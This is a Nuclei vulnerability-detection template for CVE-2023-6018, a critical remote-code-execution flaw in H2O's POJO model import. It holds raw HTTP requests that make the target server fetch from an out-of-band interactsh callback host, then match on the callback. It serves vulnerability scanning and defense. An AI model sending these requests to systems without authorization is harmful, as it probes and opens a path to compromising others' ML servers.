51 lines
1.5 KiB
YAML
51 lines
1.5 KiB
YAML
id: h2o-pojo-import-rce
|
|
|
|
info:
|
|
name: H2O RCE via POJO Model import
|
|
author: Sierra Bearchell (Vuln Discovery), byt3bl33d3r (Nuclei Template)
|
|
severity: critical
|
|
description: RCE in H2O dashboard by (ab)using it's POJO Model import feature
|
|
reference:
|
|
- https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/
|
|
classification:
|
|
cvss-score: 10
|
|
cve-id: CVE-2023-6018
|
|
cwe-id: CWE-78
|
|
tags: h2o-3,h2o,cve,ml,protectai,huntr
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /3/ModelBuilders/generic/parameters HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51
|
|
|
|
- |
|
|
POST /3/ModelBuilders/generic/parameters HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}
|
|
|
|
- |
|
|
POST /3/ModelBuilders/generic/parameters HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}
|
|
|
|
- |
|
|
POST /3/ModelBuilders/generic HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms http Interaction
|
|
words:
|
|
- "http"
|